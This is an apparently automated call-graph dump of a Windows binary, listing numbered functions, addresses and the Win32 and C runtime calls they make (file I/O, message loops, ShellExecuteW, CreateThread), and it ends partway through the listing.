96128 6ce6aa 96127->96128 96129 6ce695 96127->96129 96137 6ce6a5 __wsopen_s 96128->96137 96141 6c918d EnterCriticalSection 96128->96141 96139 6cf2d9 20 API calls _abort 96129->96139 96131 6ce69a 96140 6d27ec 26 API calls _strftime 96131->96140 96134 6ce6c6 96142 6ce602 96134->96142 96136 6ce6d1 96158 6ce6ee LeaveCriticalSection __fread_nolock 96136->96158 96137->95938 96139->96131 96140->96137 96141->96134 96143 6ce60f 96142->96143 96145 6ce624 96142->96145 96159 6cf2d9 20 API calls _abort 96143->96159 96151 6ce61f 96145->96151 96161 6cdc0b 96145->96161 96146 6ce614 96160 6d27ec 26 API calls _strftime 96146->96160 96151->96136 96154 6ce646 96178 6d862f 96154->96178 96157 6d29c8 _free 20 API calls 96157->96151 96158->96137 96159->96146 96160->96151 96162 6cdc23 96161->96162 96166 6cdc1f 96161->96166 96163 6cd955 __fread_nolock 26 API calls 96162->96163 96162->96166 96164 6cdc43 96163->96164 96193 6d59be 96164->96193 96167 6d4d7a 96166->96167 96168 6d4d90 96167->96168 96170 6ce640 96167->96170 96169 6d29c8 _free 20 API calls 96168->96169 96168->96170 96169->96170 96171 6cd955 96170->96171 96172 6cd976 96171->96172 96173 6cd961 96171->96173 96172->96154 96325 6cf2d9 20 API calls _abort 96173->96325 96175 6cd966 96326 6d27ec 26 API calls _strftime 96175->96326 96177 6cd971 96177->96154 96179 6d863e 96178->96179 96180 6d8653 96178->96180 96327 6cf2c6 20 API calls _abort 96179->96327 96182 6d868e 96180->96182 96185 6d867a 96180->96185 96332 6cf2c6 20 API calls _abort 96182->96332 96184 6d8643 96328 6cf2d9 20 API calls _abort 96184->96328 96329 6d8607 96185->96329 96186 6d8693 96333 6cf2d9 20 API calls _abort 96186->96333 96190 6ce64c 96190->96151 96190->96157 96191 6d869b 96334 6d27ec 26 API calls _strftime 96191->96334 96194 6d59ca BuildCatchObjectHelperInternal 96193->96194 96195 6d59ea 96194->96195 96196 6d59d2 96194->96196 96198 6d5a88 96195->96198 96202 6d5a1f 96195->96202 96218 6cf2c6 20 API calls _abort 96196->96218 96277 6cf2c6 20 API calls _abort 96198->96277 96199 6d59d7 96219 6cf2d9 20 API calls _abort 96199->96219 96201 6d5a8d 96278 6cf2d9 20 API calls _abort 96201->96278 96220 6d5147 EnterCriticalSection 96202->96220 96206 6d5a95 96279 6d27ec 26 API calls _strftime 96206->96279 96207 6d5a25 96209 6d5a56 96207->96209 96210 6d5a41 96207->96210 96223 6d5aa9 96209->96223 96221 6cf2d9 20 API calls _abort 96210->96221 96213 6d5a46 96222 6cf2c6 20 API calls _abort 96213->96222 96214 6d59df __wsopen_s 96214->96166 96215 6d5a51 96276 6d5a80 LeaveCriticalSection __wsopen_s 96215->96276 96218->96199 96219->96214 96220->96207 96221->96213 96222->96215 96224 6d5ad7 96223->96224 96264 6d5ad0 96223->96264 96225 6d5adb 96224->96225 96226 6d5afa 96224->96226 96280 6cf2c6 20 API calls _abort 96225->96280 96229 6d5b4b 96226->96229 96230 6d5b2e 96226->96230 96234 6d5b61 96229->96234 96286 6d9424 28 API calls __fread_nolock 96229->96286 96283 6cf2c6 20 API calls _abort 96230->96283 96231 6d5cb1 96231->96215 96232 6d5ae0 96281 6cf2d9 20 API calls _abort 96232->96281 96287 6d564e 96234->96287 96237 6d5b33 96284 6cf2d9 20 API calls _abort 96237->96284 96239 6d5ae7 96282 6d27ec 26 API calls _strftime 96239->96282 96243 6d5b6f 96246 6d5b95 96243->96246 96247 6d5b73 96243->96247 96244 6d5ba8 96249 6d5bbc 96244->96249 96250 6d5c02 WriteFile 96244->96250 96245 6d5b3b 96285 6d27ec 26 API calls _strftime 96245->96285 96295 6d542e 45 API calls 3 library calls 96246->96295 96251 6d5c69 96247->96251 96294 6d55e1 GetLastError WriteConsoleW CreateFileW __wsopen_s 96247->96294 96254 6d5bc4 96249->96254 96255 6d5bf2 96249->96255 96253 6d5c25 GetLastError 96250->96253 96258 6d5b8b 96250->96258 96251->96264 96302 6cf2d9 20 API calls _abort 96251->96302 96253->96258 96259 6d5bc9 96254->96259 96260 6d5be2 96254->96260 96298 6d56c4 7 API calls 2 library calls 96255->96298 96258->96251 96258->96264 96268 6d5c45 96258->96268 96259->96251 96261 6d5bd2 96259->96261 96297 6d5891 8 API calls 2 library calls 96260->96297 96296 6d57a3 7 API calls 2 library calls 96261->96296 96263 6d5be0 96263->96258 96304 6c0a8c 96264->96304 96267 6d5c8e 96303 6cf2c6 20 API calls _abort 96267->96303 96270 6d5c4c 96268->96270 96271 6d5c60 96268->96271 96299 6cf2d9 20 API calls _abort 96270->96299 96301 6cf2a3 20 API calls 2 library calls 96271->96301 96274 6d5c51 96300 6cf2c6 20 API calls _abort 96274->96300 96276->96214 96277->96201 96278->96206 96279->96214 96280->96232 96281->96239 96282->96264 96283->96237 96284->96245 96285->96264 96286->96234 96311 6df89b 96287->96311 96289 6d565e 96290 6d5663 96289->96290 96320 6d2d74 38 API calls 2 library calls 96289->96320 96290->96243 96290->96244 96292 6d5686 96292->96290 96293 6d56a4 GetConsoleMode 96292->96293 96293->96290 96294->96258 96295->96258 96296->96263 96297->96263 96298->96263 96299->96274 96300->96264 96301->96264 96302->96267 96303->96264 96305 6c0a95 96304->96305 96306 6c0a97 IsProcessorFeaturePresent 96304->96306 96305->96231 96308 6c0c5d 96306->96308 96324 6c0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96308->96324 96310 6c0d40 96310->96231 96312 6df8a8 96311->96312 96313 6df8b5 96311->96313 96321 6cf2d9 20 API calls _abort 96312->96321 96317 6df8c1 96313->96317 96322 6cf2d9 20 API calls _abort 96313->96322 96316 6df8ad 96316->96289 96317->96289 96318 6df8e2 96323 6d27ec 26 API calls _strftime 96318->96323 96320->96292 96321->96316 96322->96318 96323->96316 96324->96310 96325->96175 96326->96177 96327->96184 96328->96190 96335 6d8585 96329->96335 96331 6d862b 96331->96190 96332->96186 96333->96191 96334->96190 96336 6d8591 BuildCatchObjectHelperInternal 96335->96336 96346 6d5147 EnterCriticalSection 96336->96346 96338 6d859f 96339 6d85c6 96338->96339 96340 6d85d1 96338->96340 96347 6d86ae 96339->96347 96362 6cf2d9 20 API calls _abort 96340->96362 96343 6d85cc 96363 6d85fb LeaveCriticalSection __wsopen_s 96343->96363 96345 6d85ee __wsopen_s 96345->96331 96346->96338 96364 6d53c4 96347->96364 96349 6d86c4 96377 6d5333 21 API calls 3 library calls 96349->96377 96351 6d86be 96351->96349 96354 6d53c4 __wsopen_s 26 API calls 96351->96354 96361 6d86f6 96351->96361 96352 6d53c4 __wsopen_s 26 API calls 96355 6d8702 CloseHandle 96352->96355 96353 6d871c 96356 6d873e 96353->96356 96378 6cf2a3 20 API calls 2 library calls 96353->96378 96357 6d86ed 96354->96357 96355->96349 96358 6d870e GetLastError 96355->96358 96356->96343 96360 6d53c4 __wsopen_s 26 API calls 96357->96360 96358->96349 96360->96361 96361->96349 96361->96352 96362->96343 96363->96345 96365 6d53d1 96364->96365 96367 6d53e6 96364->96367 96379 6cf2c6 20 API calls _abort 96365->96379 96372 6d540b 96367->96372 96381 6cf2c6 20 API calls _abort 96367->96381 96369 6d53d6 96380 6cf2d9 20 API calls _abort 96369->96380 96370 6d5416 96382 6cf2d9 20 API calls _abort 96370->96382 96372->96351 96374 6d53de 96374->96351 96375 6d541e 96383 6d27ec 26 API calls _strftime 96375->96383 96377->96353 96378->96356 96379->96369 96380->96374 96381->96370 96382->96375 96383->96374 96385 6a6f46 96384->96385 96386 6a6f4c 96384->96386 96385->95794 96387 6bfe0b 22 API calls 96386->96387 96387->96385 96388 6e2ba5 96389 6e2baf 96388->96389 96390 6a2b25 96388->96390 96422 6a3a5a 96389->96422 96416 6a2b83 7 API calls 96390->96416 96394 6e2bb8 96429 6a9cb3 96394->96429 96397 6a2b2f 96408 6a2b44 96397->96408 96420 6a3837 49 API calls ___scrt_fastfail 96397->96420 96398 6e2bc6 96399 6e2bce 96398->96399 96400 6e2bf5 96398->96400 96435 6a33c6 96399->96435 96401 6a33c6 22 API calls 96400->96401 96404 6e2bf1 GetForegroundWindow ShellExecuteW 96401->96404 96410 6e2c26 96404->96410 96409 6a2b5f 96408->96409 96421 6a30f2 Shell_NotifyIconW ___scrt_fastfail 96408->96421 96413 6a2b66 SetCurrentDirectoryW 96409->96413 96410->96409 96415 6a2b7a 96413->96415 96414 6a33c6 22 API calls 96414->96404 96453 6a2cd4 7 API calls 96416->96453 96418 6a2b2a 96419 6a2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 96418->96419 96419->96397 96420->96408 96421->96409 96423 6e1f50 __wsopen_s 96422->96423 96424 6a3a67 GetModuleFileNameW 96423->96424 96425 6a9cb3 22 API calls 96424->96425 96426 6a3a8d 96425->96426 96427 6a3aa2 23 API calls 96426->96427 96428 6a3a97 96427->96428 96428->96394 96430 6a9cc2 _wcslen 96429->96430 96431 6bfe0b 22 API calls 96430->96431 96432 6a9cea __fread_nolock 96431->96432 96433 6bfddb 22 API calls 96432->96433 96434 6a9d00 96433->96434 96434->96398 96436 6e30bb 96435->96436 96437 6a33dd 96435->96437 96438 6bfddb 22 API calls 96436->96438 96454 6a33ee 96437->96454 96441 6e30c5 _wcslen 96438->96441 96440 6a33e8 96444 6a6350 96440->96444 96442 6bfe0b 22 API calls 96441->96442 96443 6e30fe __fread_nolock 96442->96443 96445 6a6362 96444->96445 96446 6e4a51 96444->96446 96469 6a6373 96445->96469 96479 6a4a88 22 API calls __fread_nolock 96446->96479 96449 6a636e 96449->96414 96450 6e4a5b 96451 6e4a67 96450->96451 96480 6aa8c7 96450->96480 96453->96418 96455 6a33fe _wcslen 96454->96455 96456 6e311d 96455->96456 96457 6a3411 96455->96457 96459 6bfddb 22 API calls 96456->96459 96464 6aa587 96457->96464 96461 6e3127 96459->96461 96460 6a341e __fread_nolock 96460->96440 96462 6bfe0b 22 API calls 96461->96462 96463 6e3157 __fread_nolock 96462->96463 96465 6aa59d 96464->96465 96468 6aa598 __fread_nolock 96464->96468 96466 6ef80f 96465->96466 96467 6bfe0b 22 API calls 96465->96467 96467->96468 96468->96460 96470 6a6382 96469->96470 96476 6a63b6 __fread_nolock 96469->96476 96471 6e4a82 96470->96471 96472 6a63a9 96470->96472 96470->96476 96474 6bfddb 22 API calls 96471->96474 96473 6aa587 22 API calls 96472->96473 96473->96476 96475 6e4a91 96474->96475 96477 6bfe0b 22 API calls 96475->96477 96476->96449 96478 6e4ac5 __fread_nolock 96477->96478 96479->96450 96481 6aa8db 96480->96481 96483 6aa8ea __fread_nolock 96480->96483 96482 6bfe0b 22 API calls 96481->96482 96481->96483 96482->96483 96483->96451 96484 6a1044 96489 6a10f3 96484->96489 96486 6a104a 96525 6c00a3 29 API calls __onexit 96486->96525 96488 6a1054 96526 6a1398 96489->96526 96493 6a116a 96494 6aa961 22 API calls 96493->96494 96495 6a1174 96494->96495 96496 6aa961 22 API calls 96495->96496 96497 6a117e 96496->96497 96498 6aa961 22 API calls 96497->96498 96499 6a1188 96498->96499 96500 6aa961 22 API calls 96499->96500 96501 6a11c6 96500->96501 96502 6aa961 22 API calls 96501->96502 96503 6a1292 96502->96503 96536 6a171c 96503->96536 96507 6a12c4 96508 6aa961 22 API calls 96507->96508 96509 6a12ce 96508->96509 96557 6b1940 96509->96557 96511 6a12f9 96567 6a1aab 96511->96567 96513 6a1315 96514 6a1325 GetStdHandle 96513->96514 96515 6a137a 96514->96515 96516 6e2485 96514->96516 96520 6a1387 OleInitialize 96515->96520 96516->96515 96517 6e248e 96516->96517 96518 6bfddb 22 API calls 96517->96518 96519 6e2495 96518->96519 96574 71011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 96519->96574 96520->96486 96522 6e249e 96575 710944 CreateThread 96522->96575 96524 6e24aa CloseHandle 96524->96515 96525->96488 96576 6a13f1 96526->96576 96529 6a13f1 22 API calls 96530 6a13d0 96529->96530 96531 6aa961 22 API calls 96530->96531 96532 6a13dc 96531->96532 96533 6a6b57 22 API calls 96532->96533 96534 6a1129 96533->96534 96535 6a1bc3 6 API calls 96534->96535 96535->96493 96537 6aa961 22 API calls 96536->96537 96538 6a172c 96537->96538 96539 6aa961 22 API calls 96538->96539 96540 6a1734 96539->96540 96541 6aa961 22 API calls 96540->96541 96542 6a174f 96541->96542 96543 6bfddb 22 API calls 96542->96543 96544 6a129c 96543->96544 96545 6a1b4a 96544->96545 96546 6a1b58 96545->96546 96547 6aa961 22 API calls 96546->96547 96548 6a1b63 96547->96548 96549 6aa961 22 API calls 96548->96549 96550 6a1b6e 96549->96550 96551 6aa961 22 API calls 96550->96551 96552 6a1b79 96551->96552 96553 6aa961 22 API calls 96552->96553 96554 6a1b84 96553->96554 96555 6bfddb 22 API calls 96554->96555 96556 6a1b96 RegisterWindowMessageW 96555->96556 96556->96507 96558 6b1981 96557->96558 96563 6b195d 96557->96563 96583 6c0242 5 API calls __Init_thread_wait 96558->96583 96561 6b8727 96566 6b196e 96561->96566 96586 6c01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96561->96586 96562 6b198b 96562->96563 96584 6c01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96562->96584 96563->96566 96585 6c0242 5 API calls __Init_thread_wait 96563->96585 96566->96511 96568 6a1abb 96567->96568 96569 6e272d 96567->96569 96571 6bfddb 22 API calls 96568->96571 96587 713209 23 API calls 96569->96587 96572 6a1ac3 96571->96572 96572->96513 96573 6e2738 96574->96522 96575->96524 96588 71092a 28 API calls 96575->96588 96577 6aa961 22 API calls 96576->96577 96578 6a13fc 96577->96578 96579 6aa961 22 API calls 96578->96579 96580 6a1404 96579->96580 96581 6aa961 22 API calls 96580->96581 96582 6a13c6 96581->96582 96582->96529 96583->96562 96584->96563 96585->96561 96586->96566 96587->96573 96589 6f3a41 96593 7110c0 96589->96593 96591 6f3a4c 96592 7110c0 53 API calls 96591->96592 96592->96591 96594 7110cd 96593->96594 96603 7110fa 96593->96603 96595 7110fc 96594->96595 96597 711101 96594->96597 96601 7110f4 96594->96601 96594->96603 96628 6bfa11 53 API calls 96595->96628 96604 6a7510 96597->96604 96600 6a6350 22 API calls 96600->96603 96627 6ab270 39 API calls 96601->96627 96603->96591 96605 6a7522 96604->96605 96606 6a7525 96604->96606 96605->96600 96607 6a755b 96606->96607 96608 6a752d 96606->96608 96609 6e50f6 96607->96609 96612 6a756d 96607->96612 96620 6e500f 96607->96620 96629 6c51c6 26 API calls 96608->96629 96632 6c5183 26 API calls 96609->96632 96630 6bfb21 51 API calls 96612->96630 96613 6a753d 96617 6bfddb 22 API calls 96613->96617 96614 6e510e 96614->96614 96618 6a7547 96617->96618 96621 6a9cb3 22 API calls 96618->96621 96619 6e5088 96631 6bfb21 51 API calls 96619->96631 96620->96619 96622 6bfe0b 22 API calls 96620->96622 96621->96605 96623 6e5058 96622->96623 96624 6bfddb 22 API calls 96623->96624 96625 6e507f 96624->96625 96626 6a9cb3 22 API calls 96625->96626 96626->96619 96627->96603 96628->96597 96629->96613 96630->96613 96631->96609 96632->96614 96633 6f2a00 96647 6ad7b0 messages 96633->96647 96634 6adb11 PeekMessageW 96634->96647 96635 6ad807 GetInputState 96635->96634 96635->96647 96637 6f1cbe TranslateAcceleratorW 96637->96647 96638 6adb8f PeekMessageW 96638->96647 96639 6adb73 TranslateMessage DispatchMessageW 96639->96638 96640 6ada04 timeGetTime 96640->96647 96641 6adbaf Sleep 96654 6adbc0 96641->96654 96642 6f2b74 Sleep 96642->96654 96643 6f1dda timeGetTime 96810 6be300 23 API calls 96643->96810 96644 6be551 timeGetTime 96644->96654 96647->96634 96647->96635 96647->96637 96647->96638 96647->96639 96647->96640 96647->96641 96647->96642 96647->96643 96655 6ad9d5 96647->96655 96665 6adfd0 96647->96665 96688 6b1310 96647->96688 96746 6bedf6 96647->96746 96751 6add50 235 API calls 96647->96751 96752 6abf40 96647->96752 96811 713a2a 23 API calls 96647->96811 96812 6aec40 96647->96812 96836 71359c 82 API calls __wsopen_s 96647->96836 96648 6f2c0b GetExitCodeProcess 96651 6f2c37 CloseHandle 96648->96651 96652 6f2c21 WaitForSingleObject 96648->96652 96649 7329bf GetForegroundWindow 96649->96654 96651->96654 96652->96647 96652->96651 96653 6f2a31 96653->96655 96654->96644 96654->96647 96654->96648 96654->96649 96654->96653 96654->96655 96656 6f2ca9 Sleep 96654->96656 96837 725658 23 API calls 96654->96837 96838 70e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 96654->96838 96839 70d4dc 47 API calls 96654->96839 96656->96647 96666 6ae010 96665->96666 96682 6ae0dc messages 96666->96682 96842 6c0242 5 API calls __Init_thread_wait 96666->96842 96669 6f2fca 96671 6aa961 22 API calls 96669->96671 96669->96682 96670 6aa961 22 API calls 96670->96682 96672 6f2fe4 96671->96672 96843 6c00a3 29 API calls __onexit 96672->96843 96676 6f2fee 96844 6c01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96676->96844 96679 71359c 82 API calls 96679->96682 96681 6aa8c7 22 API calls 96681->96682 96682->96670 96682->96679 96682->96681 96683 6aec40 235 API calls 96682->96683 96684 6ae3e1 96682->96684 96685 6b04f0 22 API calls 96682->96685 96840 6aa81b 41 API calls 96682->96840 96841 6ba308 235 API calls 96682->96841 96845 6c0242 5 API calls __Init_thread_wait 96682->96845 96846 6c00a3 29 API calls __onexit 96682->96846 96847 6c01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96682->96847 96848 7247d4 235 API calls 96682->96848 96849 7268c1 235 API calls 96682->96849 96683->96682 96684->96647 96685->96682 96689 6b17b0 96688->96689 96690 6b1376 96688->96690 96962 6c0242 5 API calls __Init_thread_wait 96689->96962 96691 6b1390 96690->96691 96692 6f6331 96690->96692 96694 6b1940 9 API calls 96691->96694 96967 72709c 235 API calls 96692->96967 96697 6b13a0 96694->96697 96696 6b17ba 96699 6b17fb 96696->96699 96701 6a9cb3 22 API calls 96696->96701 96700 6b1940 9 API calls 96697->96700 96698 6f633d 96698->96647 96703 6f6346 96699->96703 96705 6b182c 96699->96705 96702 6b13b6 96700->96702 96708 6b17d4 96701->96708 96702->96699 96704 6b13ec 96702->96704 96968 71359c 82 API calls __wsopen_s 96703->96968 96704->96703 96728 6b1408 __fread_nolock 96704->96728 96964 6aaceb 23 API calls messages 96705->96964 96963 6c01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96708->96963 96709 6b1839 96965 6bd217 235 API calls 96709->96965 96711 6f636e 96969 71359c 82 API calls __wsopen_s 96711->96969 96713 6b152f 96715 6b153c 96713->96715 96716 6f63d1 96713->96716 96718 6b1940 9 API calls 96715->96718 96971 725745 54 API calls _wcslen 96716->96971 96719 6b1549 96718->96719 96723 6f64fa 96719->96723 96725 6b1940 9 API calls 96719->96725 96720 6bfddb 22 API calls 96720->96728 96721 6b1872 96966 6bfaeb 23 API calls 96721->96966 96722 6bfe0b 22 API calls 96722->96728 96732 6f6369 96723->96732 96972 71359c 82 API calls __wsopen_s 96723->96972 96730 6b1563 96725->96730 96727 6aec40 235 API calls 96727->96728 96728->96709 96728->96711 96728->96713 96728->96720 96728->96722 96728->96727 96729 6f63b2 96728->96729 96728->96732 96970 71359c 82 API calls __wsopen_s 96729->96970 96730->96723 96733 6aa8c7 22 API calls 96730->96733 96735 6b15c7 messages 96730->96735 96732->96647 96733->96735 96734 6b1940 9 API calls 96734->96735 96735->96721 96735->96723 96735->96732 96735->96734 96737 6b167b messages 96735->96737 96740 6a4f39 68 API calls 96735->96740 96850 716ef1 96735->96850 96930 72e505 96735->96930 96943 70d4ce 96735->96943 96946 71f0ec 96735->96946 96955 72958b 96735->96955 96958 72959f 96735->96958 96736 6b171d 96736->96647 96737->96736 96961 6bce17 22 API calls messages 96737->96961 96740->96735 96747 6bee09 96746->96747 96748 6bee12 96746->96748 96747->96647 96748->96747 96749 6bee36 IsDialogMessageW 96748->96749 96750 6fefaf GetClassLongW 96748->96750 96749->96747 96749->96748 96750->96748 96750->96749 96751->96647 97352 6aadf0 96752->97352 96754 6abf9d 96755 6abfa9 96754->96755 96756 6f04b6 96754->96756 96758 6f04c6 96755->96758 96759 6ac01e 96755->96759 97371 71359c 82 API calls __wsopen_s 96756->97371 97372 71359c 82 API calls __wsopen_s 96758->97372 97357 6aac91 96759->97357 96762 6ac7da 96767 6bfe0b 22 API calls 96762->96767 96764 707120 22 API calls 96806 6ac039 __fread_nolock messages 96764->96806 96776 6ac808 __fread_nolock 96767->96776 96769 6f04f5 96773 6f055a 96769->96773 97373 6bd217 235 API calls 96769->97373 96772 6aaf8a 22 API calls 96772->96806 96809 6ac603 96773->96809 97374 71359c 82 API calls __wsopen_s 96773->97374 96774 6aec40 235 API calls 96774->96806 96775 6bfe0b 22 API calls 96797 6ac350 __fread_nolock messages 96775->96797 96776->96775 96777 6f091a 97384 713209 23 API calls 96777->97384 96780 6f08a5 96781 6aec40 235 API calls 96780->96781 96783 6f08cf 96781->96783 96783->96809 97382 6aa81b 41 API calls 96783->97382 96784 6f0591 97375 71359c 82 API calls __wsopen_s 96784->97375 96785 6f08f6 97383 71359c 82 API calls __wsopen_s 96785->97383 96790 6abbe0 40 API calls 96790->96806 96791 6ac3ac 96791->96647 96792 6ac237 96794 6ac253 96792->96794 96795 6aa8c7 22 API calls 96792->96795 96796 6f0976 96794->96796 96802 6ac297 messages 96794->96802 96795->96794 97385 6aaceb 23 API calls messages 96796->97385 96797->96791 97370 6bce17 22 API calls messages 96797->97370 96800 6f09bf 96800->96809 97386 71359c 82 API calls __wsopen_s 96800->97386 96801 6bfddb 22 API calls 96801->96806 96802->96800 97368 6aaceb 23 API calls messages 96802->97368 96804 6ac335 96804->96800 96805 6ac342 96804->96805 97369 6aa704 22 API calls messages 96805->97369 96806->96762 96806->96764 96806->96769 96806->96772 96806->96773 96806->96774 96806->96776 96806->96777 96806->96780 96806->96784 96806->96785 96806->96790 96806->96792 96806->96800 96806->96801 96808 6bfe0b 22 API calls 96806->96808 96806->96809 97361 6aad81 96806->97361 97376 707099 22 API calls __fread_nolock 96806->97376 97377 725745 54 API calls _wcslen 96806->97377 97378 6baa42 22 API calls messages 96806->97378 97379 70f05c 40 API calls 96806->97379 97380 6aa993 41 API calls 96806->97380 97381 6aaceb 23 API calls messages 96806->97381 96808->96806 96809->96647 96810->96647 96811->96647 96828 6aec76 messages 96812->96828 96813 6c0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96813->96828 96814 6bfddb 22 API calls 96814->96828 96816 6afef7 96820 6aa8c7 22 API calls 96816->96820 96834 6aed9d messages 96816->96834 96818 6f4600 96823 6aa8c7 22 API calls 96818->96823 96818->96834 96819 6f4b0b 97411 71359c 82 API calls __wsopen_s 96819->97411 96820->96834 96823->96834 96825 6aa8c7 22 API calls 96825->96828 96826 6afbe3 96829 6f4bdc 96826->96829 96826->96834 96835 6af3ae messages 96826->96835 96827 6aa961 22 API calls 96827->96828 96828->96813 96828->96814 96828->96816 96828->96818 96828->96819 96828->96825 96828->96826 96828->96827 96831 6c00a3 29 API calls pre_c_initialization 96828->96831 96832 6f4beb 96828->96832 96833 6c01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96828->96833 96828->96834 96828->96835 97395 6b06a0 96828->97395 97409 6b01e0 235 API calls 2 library calls 96828->97409 97412 71359c 82 API calls __wsopen_s 96829->97412 96831->96828 97413 71359c 82 API calls __wsopen_s 96832->97413 96833->96828 96834->96647 96835->96834 97410 71359c 82 API calls __wsopen_s 96835->97410 96836->96647 96837->96654 96838->96654 96839->96654 96840->96682 96841->96682 96842->96669 96843->96676 96844->96682 96845->96682 96846->96682 96847->96682 96848->96682 96849->96682 96851 6aa961 22 API calls 96850->96851 96852 716f1d 96851->96852 96853 6aa961 22 API calls 96852->96853 96854 716f26 96853->96854 96857 716f3a 96854->96857 97127 6ab567 96854->97127 96856 6a7510 53 API calls 96864 716f57 _wcslen 96856->96864 96857->96856 96858 716fbc 96860 6a7510 53 API calls 96858->96860 96859 7170bf 96861 6a4ecb 94 API calls 96859->96861 96862 716fc8 96860->96862 96863 7170d0 96861->96863 96867 6aa8c7 22 API calls 96862->96867 96872 716fdb 96862->96872 96865 7170e5 96863->96865 96868 6a4ecb 94 API calls 96863->96868 96864->96858 96864->96859 96929 7170e9 96864->96929 96866 6aa961 22 API calls 96865->96866 96865->96929 96869 71711a 96866->96869 96867->96872 96868->96865 96870 6aa961 22 API calls 96869->96870 96874 717126 96870->96874 96871 717027 96873 6a7510 53 API calls 96871->96873 96872->96871 96875 717005 96872->96875 96878 6aa8c7 22 API calls 96872->96878 96876 717034 96873->96876 96877 6aa961 22 API calls 96874->96877 96879 6a33c6 22 API calls 96875->96879 96880 717047 96876->96880 96881 71703d 96876->96881 96882 71712f 96877->96882 96878->96875 96883 71700f 96879->96883 97132 70e199 GetFileAttributesW 96880->97132 96885 6aa8c7 22 API calls 96881->96885 96887 6aa961 22 API calls 96882->96887 96884 6a7510 53 API calls 96883->96884 96888 71701b 96884->96888 96885->96880 96890 717138 96887->96890 96891 6a6350 22 API calls 96888->96891 96889 717050 96892 717063 96889->96892 96895 6a4c6d 22 API calls 96889->96895 96893 6a7510 53 API calls 96890->96893 96891->96871 96894 6a7510 53 API calls 96892->96894 96902 717069 96892->96902 96896 717145 96893->96896 96897 7170a0 96894->96897 96895->96892 96973 6a525f 96896->96973 97133 70d076 57 API calls 96897->97133 96900 717166 97015 6a4c6d 96900->97015 96902->96929 96904 7171a9 96906 6aa8c7 22 API calls 96904->96906 96905 6a4c6d 22 API calls 96907 717186 96905->96907 96908 7171ba 96906->96908 96907->96904 96910 6a6b57 22 API calls 96907->96910 96909 6a6350 22 API calls 96908->96909 96911 7171c8 96909->96911 96912 71719b 96910->96912 96913 6a6350 22 API calls 96911->96913 96914 6a6b57 22 API calls 96912->96914 96915 7171d6 96913->96915 96914->96904 96916 6a6350 22 API calls 96915->96916 96917 7171e4 96916->96917 96918 6a7510 53 API calls 96917->96918 96919 7171f0 96918->96919 97018 70d7bc 96919->97018 96921 717201 96922 70d4ce 4 API calls 96921->96922 96923 71720b 96922->96923 96924 6a7510 53 API calls 96923->96924 96928 717239 96923->96928 96925 717229 96924->96925 97072 712947 96925->97072 96927 6a4f39 68 API calls 96927->96929 96928->96927 96929->96735 96931 6a7510 53 API calls 96930->96931 96932 72e51d 96931->96932 96933 6aa961 22 API calls 96932->96933 96934 72e52b 96933->96934 96935 6ab567 39 API calls 96934->96935 96936 72e536 96935->96936 96937 72e560 96936->96937 96940 6a7510 53 API calls 96936->96940 97213 6a62b5 22 API calls 96937->97213 96939 72e56c 96939->96735 96941 72e551 96940->96941 96942 6a6d25 22 API calls 96941->96942 96942->96937 97214 70dbbe lstrlenW 96943->97214 96947 6a7510 53 API calls 96946->96947 96948 71f126 96947->96948 97219 6a9e90 96948->97219 96950 71f136 96951 71f15b 96950->96951 96952 6aec40 235 API calls 96950->96952 96954 71f15f 96951->96954 97247 6a9c6e 22 API calls 96951->97247 96952->96951 96954->96735 97260 727f59 96955->97260 96957 72959b 96957->96735 96959 727f59 120 API calls 96958->96959 96960 7295af 96959->96960 96960->96735 96961->96737 96962->96696 96963->96699 96964->96709 96965->96721 96966->96721 96967->96698 96968->96732 96969->96732 96970->96732 96971->96730 96972->96732 96974 6aa961 22 API calls 96973->96974 96975 6a5275 96974->96975 96976 6aa961 22 API calls 96975->96976 96977 6a527d 96976->96977 96978 6aa961 22 API calls 96977->96978 96979 6a5285 96978->96979 96980 6aa961 22 API calls 96979->96980 96981 6a528d 96980->96981 96982 6e3df5 96981->96982 96983 6a52c1 96981->96983 96984 6aa8c7 22 API calls 96982->96984 96985 6a6d25 22 API calls 96983->96985 96986 6e3dfe 96984->96986 96987 6a52cf 96985->96987 96989 6aa6c3 22 API calls 96986->96989 96988 6a93b2 22 API calls 96987->96988 96990 6a52d9 96988->96990 96991 6a5304 96989->96991 96990->96991 96992 6a6d25 22 API calls 96990->96992 96993 6a5349 96991->96993 96994 6a5325 96991->96994 97010 6e3e20 96991->97010 96996 6a52fa 96992->96996 97134 6a6d25 96993->97134 96994->96993 97000 6a4c6d 22 API calls 96994->97000 96998 6a93b2 22 API calls 96996->96998 96997 6a535a 96999 6a5370 96997->96999 97004 6aa8c7 22 API calls 96997->97004 96998->96991 97002 6a5384 96999->97002 97007 6aa8c7 22 API calls 96999->97007 97003 6a5332 97000->97003 97001 6a6b57 22 API calls 97012 6e3ee0 97001->97012 97005 6a538f 97002->97005 97008 6aa8c7 22 API calls 97002->97008 97003->96993 97006 6a6d25 22 API calls 97003->97006 97004->96999 97009 6aa8c7 22 API calls 97005->97009 97013 6a539a 97005->97013 97006->96993 97007->97002 97008->97005 97009->97013 97010->97001 97011 6a4c6d 22 API calls 97011->97012 97012->96993 97012->97011 97147 6a49bd 22 API calls __fread_nolock 97012->97147 97013->96900 97016 6aaec9 22 API calls 97015->97016 97017 6a4c78 97016->97017 97017->96904 97017->96905 97019 70d7d8 97018->97019 97020 70d7f3 97019->97020 97021 70d7dd 97019->97021 97022 6aa961 22 API calls 97020->97022 97023 6aa8c7 22 API calls 97021->97023 97071 70d7ee 97021->97071 97024 70d7fb 97022->97024 97023->97071 97025 6aa961 22 API calls 97024->97025 97026 70d803 97025->97026 97027 6aa961 22 API calls 97026->97027 97028 70d80e 97027->97028 97029 6aa961 22 API calls 97028->97029 97030 70d816 97029->97030 97031 6aa961 22 API calls 97030->97031 97032 70d81e 97031->97032 97033 